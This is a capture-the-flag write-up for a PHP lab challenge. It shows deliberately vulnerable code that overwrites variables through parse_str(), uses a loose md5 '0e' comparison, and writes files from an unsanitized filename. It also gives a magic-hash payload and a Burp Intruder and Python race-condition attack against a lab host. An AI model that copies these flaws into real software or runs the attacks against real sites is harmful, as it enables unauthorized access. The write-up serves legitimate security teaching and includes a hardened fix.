[Red Day7-CTF] parse_str function defect vulnerability

Exercise Record

Reproduce the code:

index.php

<?php
$a = "hongri";
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    echo '<a href="flag.php">flag is here</a>';
}
?>

flag.php

// flag.php
<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
    $savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
    if (!is_dir($savepath)) {
        $oldmask = umask(0);
        mkdir($savepath, 0777);
        umask($oldmask);
    }
    if ((@$_GET['filename']) && (@$_GET['content'])) {
        //$fp = fopen("$savepath".$_GET['filename'], 'w');
        $content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
        file_put_contents("$savepath" . $_GET['filename'], $content);
        $msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
        usleep(100000);
        $content = "Too slow!";
        file_put_contents("$savepath" . $_GET['filename'], $content);
    }
   print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
    echo 'you can not see this page';
}
?>

Vulnerability Analysis:

Enter the site:

http://10.211.55.5/PHPcode/day7/index.php

The page loads normally and can be operated.

Line 4 of index.php calls @parse_str($id);. This function does not check whether a variable already exists: if the incoming data defines a variable with the same name as one already in the current scope (here $a), that variable is overwritten directly. Line 6 then contains the following code.

if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {

PHP's hash comparison is flawed: any hash value beginning with 0e is interpreted as the number 0, so if two different passwords produce hashes that both begin with 0e, PHP considers them equal, because both are 0. Here md5('QNKCDZO') is 0e830400451993494058024219903391, so the payload is ?id=a[0]=s878926199a. This produces the echo on the page.

http://10.211.55.5/PHPcode/day7/?id=a[0]=s878926199a
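The two index.php weaknesses described above, the loose == on 0e hashes and parse_str() writing straight into the current scope, shown next to a hardened version of the same check. This is an added example, not code from the original write-up; the function names vulnerable() and hardened() are mine, and the single-argument parse_str() call only runs on PHP 7.

```php
<?php
// Added example, not part of the original write-up: why the index.php check
// passes, and a hardened form of the same check. Run with the PHP CLI.

// 1. Loose comparison of "0e..." hashes. Both strings are numeric in PHP's
//    eyes (0 * 10^n), so == compares them as numbers and treats them as equal.
//    === and hash_equals() compare the bytes and see two different strings.
$h1 = md5('QNKCDZO');      // 0e830400451993494058024219903391
$h2 = md5('s878926199a');  // another md5 digest that starts with 0e
var_dump($h1 == $h2, $h1 === $h2, hash_equals($h1, $h2));

// 2. Vulnerable form from index.php: parse_str() with no result array writes
//    directly into the current scope, so ?id=a[0]=... replaces the local $a.
//    The single-argument call only exists in PHP 7; PHP 8 requires the array.
function vulnerable(string $id): bool {
    $a = "hongri";
    @parse_str($id);  // $a silently overwritten by attacker-controlled input
    return $a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO');
}

// 3. Hardened form: parse into a dedicated array so local variables cannot be
//    overwritten, and compare the hashes byte-for-byte instead of with ==.
function hardened(string $id): bool {
    $a = "hongri";
    parse_str($id, $params);              // input lands in $params, never in $a
    $candidate = (string) ($params['a'][0] ?? '');
    return $candidate !== 'QNKCDZO'
        && hash_equals(md5('QNKCDZO'), md5($candidate));
}

$payload = 'a[0]=s878926199a';            // the payload from the write-up
if (PHP_VERSION_ID < 80000) {
    var_dump(vulnerable($payload));       // the bypass succeeds on PHP 7
}
var_dump(hardened($payload));             // the bypass no longer works
var_dump(hardened('a[0]=QNKCDZO'));       // the identical string is rejected as intended
```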

Click to enter flag.php. This is where the real point of the challenge lies. Lines 3 and 4 of flag.php are as follows:

$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {

This checks whether the Referer header is present: if it is, the upload page is shown; if not, "you can not see this page" is returned.

As we know, clicking a link through an <a> tag automatically carries a Referer field. The result with a Referer and the result without one are therefore different.
With Referer: the upload form is shown.
Without Referer: "you can not see this page" is returned.
Lines 13 to 18 of flag.php contain the following code:

$content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
file_put_contents("$savepath" . $_GET['filename'], $content);
$msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
usleep(100000);
$content = "Too slow!";
file_put_contents("$savepath" . $_GET['filename'], $content);

The key is usleep(100000): the file must be read before "Too slow!" is written over it, so this is a race condition with a short window. Also note that the upload folder path is fixed, since it is derived only from the remote address.
Accessing the file directly returns "Too slow!".

So the solution is to open Burp Intruder with 200 threads and send requests continuously to

http://10.211.55.5/PHPcode/day7/flag.php?filename=flag&content=111

Before starting the attack, a script is needed that continuously requests the following link:

http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag

Script code:

import requests

# Poll the written file as fast as possible; the flag is only present during
# the usleep() window before "Too slow!" overwrites it.
url = "http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag"
session = requests.Session()
while True:
    resp = session.get(url)
    print(resp.text)

While the Intruder attack is running, accessing the page can show the flag.


Origin blog.csdn.net/zhangpen130/article/details/103965191